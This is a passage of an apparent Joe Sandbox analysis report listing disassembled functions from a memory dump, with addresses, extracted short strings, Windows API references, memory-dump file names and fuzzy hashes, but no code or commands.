                                                                                                                      Function 00508750 Relevance: 4.1, Strings: 3, Instructions: 328COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.1427327540.00000000004E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 004E0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.1427264284.00000000004E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427369016.0000000000526000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427388797.0000000000529000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427407684.000000000052E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427430339.0000000000537000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_4e0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: InitializeThunk
                                                                                                                      • String ID: &76#$/X$BDE:
                                                                                                                      • API String ID: 2994545307-3468712750
                                                                                                                      • Opcode ID: bd296c8c01324151b4989c6711118fcf21aa0040bf0d4ab3ad44ab4c45fb0f9d
                                                                                                                      • Instruction ID: d0f7fa18d2e52bc089fa2615882f10cc939dcaf23d56b145eac72541d50b92dd
                                                                                                                      • Opcode Fuzzy Hash: bd296c8c01324151b4989c6711118fcf21aa0040bf0d4ab3ad44ab4c45fb0f9d
                                                                                                                      • Instruction Fuzzy Hash: D69118B26087019BD714EF25DC91B7FBAD2FFC5314F18892DE5C58B2D1EA3998068782
                                                                                                                      Function 0050FB7D Relevance: 4.1, Strings: 3, Instructions: 327COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.1427327540.00000000004E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 004E0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.1427264284.00000000004E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427369016.0000000000526000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427388797.0000000000529000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427407684.000000000052E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427430339.0000000000537000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_4e0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: 5$Tx+$bC
                                                                                                                      • API String ID: 0-2958649183
                                                                                                                      • Opcode ID: a8c7039ce79a83d25d556b481ee8cc07eaae2d56d1ba0a619bf351c87be2bca2
                                                                                                                      • Instruction ID: a3ca041dc73f44d4c3d777be5f7698d3ad5909de199a400b13cb13f8a23b00f7
                                                                                                                      • Opcode Fuzzy Hash: a8c7039ce79a83d25d556b481ee8cc07eaae2d56d1ba0a619bf351c87be2bca2
                                                                                                                      • Instruction Fuzzy Hash: 9EA1DE7150C3818AE739CF29C4653AFBFE1AF93304F08896DE5C987692D77A4805CB92
                                                                                                                      Function 004EF2D0 Relevance: 3.9, Strings: 3, Instructions: 168COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.1427327540.00000000004E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 004E0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.1427264284.00000000004E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427369016.0000000000526000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427388797.0000000000529000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427407684.000000000052E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427430339.0000000000537000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_4e0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: $:$K
                                                                                                                      • API String ID: 0-296352136
                                                                                                                      • Opcode ID: 9c41a96590382f64ecffa9827b7f74fa4015f5ad67683c19a2e31745ef470023
                                                                                                                      • Instruction ID: 81a06f0e288d230e4b61ba3e0aa02e0b5a62731b8bdc44dbed97ecbac664fd90
                                                                                                                      • Opcode Fuzzy Hash: 9c41a96590382f64ecffa9827b7f74fa4015f5ad67683c19a2e31745ef470023
                                                                                                                      • Instruction Fuzzy Hash: B251C03250C7D08AD7109B3984543AFBBD0AB96324F190F3EE9EAD33C2E67886058757
                                                                                                                      Function 004E4E20 Relevance: 3.3, Strings: 2, Instructions: 792COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.1427327540.00000000004E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 004E0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.1427264284.00000000004E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427369016.0000000000526000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427388797.0000000000529000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427407684.000000000052E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427430339.0000000000537000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_4e0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: 0$8
                                                                                                                      • API String ID: 0-46163386
                                                                                                                      • Opcode ID: 79aab3ffe61fed387fb0ef9b007f48c9a0672f4f06c8c2ffb53f2a777a6df493
                                                                                                                      • Instruction ID: 67cd63c4675562ed7a38fdb7daaa2a3d5f000b76b299b58dc3ad9d9f72e771d8
                                                                                                                      • Opcode Fuzzy Hash: 79aab3ffe61fed387fb0ef9b007f48c9a0672f4f06c8c2ffb53f2a777a6df493
                                                                                                                      • Instruction Fuzzy Hash: EA7257715087809FD710CF19C880BABBBE1BF88319F44891EF9998B391D379D958CB96
                                                                                                                      Function 0050BA20 Relevance: 3.1, APIs: 2, Instructions: 146COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001F,00000000,00000000,?), ref: 0050BB95
                                                                                                                      • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001F,00000000,?,?), ref: 0050BC1E
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.1427327540.00000000004E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 004E0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.1427264284.00000000004E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427369016.0000000000526000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427388797.0000000000529000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427407684.000000000052E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427430339.0000000000537000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_4e0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: EnvironmentExpandStrings
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 237503144-0
                                                                                                                      • Opcode ID: a027ff4170690c78e21b5682c39714289bea00bba35e961a309d269018b401ae
                                                                                                                      • Instruction ID: ba717ac3565c74826be4f4161db34415e27a95b43e41e63e13d29f9fd059c57e
                                                                                                                      • Opcode Fuzzy Hash: a027ff4170690c78e21b5682c39714289bea00bba35e961a309d269018b401ae
                                                                                                                      • Instruction Fuzzy Hash: 40511572518340CFE324CF66DC9575FBEA2FBC5304F16862DE5951B291CBB5840ACB82
                                                                                                                      Function 00502880 Relevance: 3.0, Strings: 2, Instructions: 455COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.1427327540.00000000004E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 004E0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.1427264284.00000000004E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427369016.0000000000526000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427388797.0000000000529000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427407684.000000000052E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427430339.0000000000537000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_4e0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: !'$27
                                                                                                                      • API String ID: 0-1982139352
                                                                                                                      • Opcode ID: 2d58db3d5636138aee960f91b0334ea98f9d3871c098168e7a42d771cf606656
                                                                                                                      • Instruction ID: ffbf8c6d1532a0291dfb4809ea666edd383c2dde4c60b97eaeb156d60e51d71b
                                                                                                                      • Opcode Fuzzy Hash: 2d58db3d5636138aee960f91b0334ea98f9d3871c098168e7a42d771cf606656
                                                                                                                      • Instruction Fuzzy Hash: CAC103B56083008BD7249F29CC9A76FBBE1FF91314F08892CE8858B2D1E679D945C752
                                                                                                                      Function 00523B60 Relevance: 2.9, Strings: 2, Instructions: 441COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.1427327540.00000000004E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 004E0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.1427264284.00000000004E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427369016.0000000000526000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427388797.0000000000529000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427407684.000000000052E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427430339.0000000000537000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_4e0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: >R$UUK
                                                                                                                      • API String ID: 0-3934609353
                                                                                                                      • Opcode ID: ac2808a9b5dfcd7c7f7413a1175d0415fcbe5d5f9ab6c99be32f4c3ec15b5527
                                                                                                                      • Instruction ID: 3975e0659d627ecf4a335fd4e330f6633cb871b32b6cce874bb6b07880a8dd3e
                                                                                                                      • Opcode Fuzzy Hash: ac2808a9b5dfcd7c7f7413a1175d0415fcbe5d5f9ab6c99be32f4c3ec15b5527
                                                                                                                      • Instruction Fuzzy Hash: B7D1E235608320CFD314DF28E89172ABBE2FF9A300F0A897DE5859B391D675D946DB81
                                                                                                                      Function 00509F7C Relevance: 2.9, Strings: 2, Instructions: 421COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.1427327540.00000000004E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 004E0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.1427264284.00000000004E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427369016.0000000000526000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427388797.0000000000529000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427407684.000000000052E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427430339.0000000000537000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_4e0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: ji46$rYaT
                                                                                                                      • API String ID: 0-3893754386
                                                                                                                      • Opcode ID: 6f789644a053041a6119176b12362288e3ee5fb388e66f3064bb73869b30a16e
                                                                                                                      • Instruction ID: 96297ace854162cd8751ca0089af7464b34a2b77fae97d8243fdd0998d65d93a
                                                                                                                      • Opcode Fuzzy Hash: 6f789644a053041a6119176b12362288e3ee5fb388e66f3064bb73869b30a16e
                                                                                                                      • Instruction Fuzzy Hash: 56E10772A08341CFD324CF28D89035ABBE2BFDA314F198A6CE5A5572E1D7319D05CB42
                                                                                                                      Function 004F95B6 Relevance: 2.9, Strings: 2, Instructions: 363COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.1427327540.00000000004E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 004E0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.1427264284.00000000004E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427369016.0000000000526000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427388797.0000000000529000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427407684.000000000052E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427430339.0000000000537000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_4e0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: =$^\
                                                                                                                      • API String ID: 0-3808277151
                                                                                                                      • Opcode ID: fa542da2700ec4a9d2e034c885e0a5cbec8f036ec44144b67635136fbb9da29d
                                                                                                                      • Instruction ID: 2bbc08c066083457dc333150061b9b7f8586f2e600b3aee07b5f3d9452517712
                                                                                                                      • Opcode Fuzzy Hash: fa542da2700ec4a9d2e034c885e0a5cbec8f036ec44144b67635136fbb9da29d
                                                                                                                      • Instruction Fuzzy Hash: 99B1D4B56483428BC328DF25C8907BBBBE1EFD5315F08896DE4D58B781E7788805CB96
                                                                                                                      Function 0050F1C1 Relevance: 2.8, Strings: 2, Instructions: 284COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.1427327540.00000000004E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 004E0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.1427264284.00000000004E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427369016.0000000000526000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427388797.0000000000529000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427407684.000000000052E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427430339.0000000000537000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_4e0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: 6$H
                                                                                                                      • API String ID: 0-1447585844
                                                                                                                      • Opcode ID: f29e4927c54ac98c179f3a0f292bae3631fadcfdbf98f53a81210e5407158525
                                                                                                                      • Instruction ID: b2c7f7b66298daa7f1d4773243383f6002c9e1a430cfd367fb018de4f8ec34f3
                                                                                                                      • Opcode Fuzzy Hash: f29e4927c54ac98c179f3a0f292bae3631fadcfdbf98f53a81210e5407158525
                                                                                                                      • Instruction Fuzzy Hash: CF813D716083914FE7188B29C4913ABBFE1AF92304F18986DF5D58B2D2D6B9C846CB52
                                                                                                                      Function 0051025E Relevance: 2.8, Strings: 2, Instructions: 282COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.1427327540.00000000004E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 004E0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.1427264284.00000000004E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427369016.0000000000526000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427388797.0000000000529000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427407684.000000000052E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427430339.0000000000537000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_4e0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: 6$H
                                                                                                                      • API String ID: 0-1447585844
                                                                                                                      • Opcode ID: 6638b2e7aec679b95dd5c4f0515b7c75de0f14e6a8597edb052b700bf6fd2e83
                                                                                                                      • Instruction ID: a7be9c9f7734b8f0f9b3619c7f9f05bc74712ee6fa3b36f2b3b05fb1c904b6dc
                                                                                                                      • Opcode Fuzzy Hash: 6638b2e7aec679b95dd5c4f0515b7c75de0f14e6a8597edb052b700bf6fd2e83
                                                                                                                      • Instruction Fuzzy Hash: 89813D716083914FE7188B39C4913ABBFE1AF92304F18D86DF5D58B2D2D6B9C846CB52
                                                                                                                      Function 005102CD Relevance: 2.8, Strings: 2, Instructions: 281COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.1427327540.00000000004E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 004E0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.1427264284.00000000004E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427369016.0000000000526000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427388797.0000000000529000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427407684.000000000052E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427430339.0000000000537000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_4e0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: 6$H
                                                                                                                      • API String ID: 0-1447585844
                                                                                                                      • Opcode ID: 6a3661824cb5675d82f7d5196d674bf8cdf02cadb8bde6f0f13a6e1d5230639f
                                                                                                                      • Instruction ID: 3238d1666c519aa56a8736e7469d53c4af2454e893ed236c1db35a2fc8ea447c
                                                                                                                      • Opcode Fuzzy Hash: 6a3661824cb5675d82f7d5196d674bf8cdf02cadb8bde6f0f13a6e1d5230639f
                                                                                                                      • Instruction Fuzzy Hash: D8813D716083914FE7188B29C4913ABBFE1AF92304F18986DF5D58B2D2D6B9C846CB52
                                                                                                                      Function 004F23EC Relevance: 2.8, Strings: 2, Instructions: 271COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.1427327540.00000000004E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 004E0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.1427264284.00000000004E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427369016.0000000000526000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427388797.0000000000529000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427407684.000000000052E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427430339.0000000000537000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_4e0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: n$n
                                                                                                                      • API String ID: 0-3874132673
                                                                                                                      • Opcode ID: 640065771ea6765fc777ed917390e0c770a06acb5a5701e8f959122f0f1be56b
                                                                                                                      • Instruction ID: 8d9ba980cc4130fb592517906380cd0f9eaa0136e79e8d24f887329dbe6b0dc6
                                                                                                                      • Opcode Fuzzy Hash: 640065771ea6765fc777ed917390e0c770a06acb5a5701e8f959122f0f1be56b
                                                                                                                      • Instruction Fuzzy Hash: 24A1F676A087908BC7249B3985813AEBBD1AFC4324F198E3EE5D9C73D1DA7888418747
                                                                                                                      Function 0051099F Relevance: 2.8, Strings: 2, Instructions: 251COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.1427327540.00000000004E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 004E0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.1427264284.00000000004E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427369016.0000000000526000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427388797.0000000000529000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427407684.000000000052E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427430339.0000000000537000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_4e0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: .^Nw$QRP,
                                                                                                                      • API String ID: 0-1311683932
                                                                                                                      • Opcode ID: 06bd46f7ea8ba8e7628b94a8ec7aae6fb66e6157ae28d0d3a008e0cd43c0151c
                                                                                                                      • Instruction ID: 388d20f166fea397abfe37a3eafde6c148902660e5c675b178ca2eb5e27b15e1
                                                                                                                      • Opcode Fuzzy Hash: 06bd46f7ea8ba8e7628b94a8ec7aae6fb66e6157ae28d0d3a008e0cd43c0151c
                                                                                                                      • Instruction Fuzzy Hash: 6F71187110D3918FE3358B2488A17EBBFE2AFD7704F18596CD0CA4B281DB764846CB91
                                                                                                                      Function 004F5DD8 Relevance: 2.7, Strings: 2, Instructions: 215COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.1427327540.00000000004E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 004E0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.1427264284.00000000004E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427369016.0000000000526000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427388797.0000000000529000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427407684.000000000052E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427430339.0000000000537000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_4e0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: 7$gfff
                                                                                                                      • API String ID: 0-3777064726
                                                                                                                      • Opcode ID: 56d709694afbbae2365113a58425666b43337978dd41983430c641dc0eda9218
                                                                                                                      • Instruction ID: 5135d4fa8cacf907bc7cca8faa10971a1e14b3c0ba5aff671e3dd6dd425a4c0a
                                                                                                                      • Opcode Fuzzy Hash: 56d709694afbbae2365113a58425666b43337978dd41983430c641dc0eda9218
                                                                                                                      • Instruction Fuzzy Hash: 6F6105726046158FE724CF29DC0576BB7D2EBC5314F19C62EE545CB3D2EB38980A8B85
                                                                                                                      Function 0051E6E0 Relevance: 2.0, Strings: 1, Instructions: 749COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.1427327540.00000000004E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 004E0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.1427264284.00000000004E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427369016.0000000000526000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427388797.0000000000529000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427407684.000000000052E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427430339.0000000000537000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_4e0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: XY
                                                                                                                      • API String ID: 0-554446067
                                                                                                                      • Opcode ID: b603dabb89a190568a156d8eb5b3558a09e4e3f3363efb78f7cb090296431f86
                                                                                                                      • Instruction ID: 0afdc45a47855749fa3ff6b67178035ddf52501b2165c7dac3422cb1c1d337b1
                                                                                                                      • Opcode Fuzzy Hash: b603dabb89a190568a156d8eb5b3558a09e4e3f3363efb78f7cb090296431f86
                                                                                                                      • Instruction Fuzzy Hash: 8E323136A18351CBD7149F28D9123ABBBF1FF96300F09C86DD88587291E778C989C792
                                                                                                                      Function 0050AF92 Relevance: 2.0, Strings: 1, Instructions: 719COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.1427327540.00000000004E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 004E0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.1427264284.00000000004E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427369016.0000000000526000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427388797.0000000000529000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427407684.000000000052E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427430339.0000000000537000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_4e0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: q
                                                                                                                      • API String ID: 0-3900047139
                                                                                                                      • Opcode ID: 06d4855ebd09dee177bcacff230c5c378d8242718aa93a40a123a69a5d10ff48
                                                                                                                      • Instruction ID: c06b6bdb856d3c7b35d507e935abf9c82eeca0bac8fea77a29ce271e4897150c
                                                                                                                      • Opcode Fuzzy Hash: 06d4855ebd09dee177bcacff230c5c378d8242718aa93a40a123a69a5d10ff48
                                                                                                                      • Instruction Fuzzy Hash: FC22F1B56483018BE724CF64C8A176FBBF1FF96314F18896CE4854B791E778890ACB46
                                                                                                                      Function 005124EE Relevance: 1.8, Strings: 1, Instructions: 514COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.1427327540.00000000004E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 004E0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.1427264284.00000000004E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427369016.0000000000526000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427388797.0000000000529000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427407684.000000000052E000.00000004.00000001.01000000.00000005.sdmpDownload File
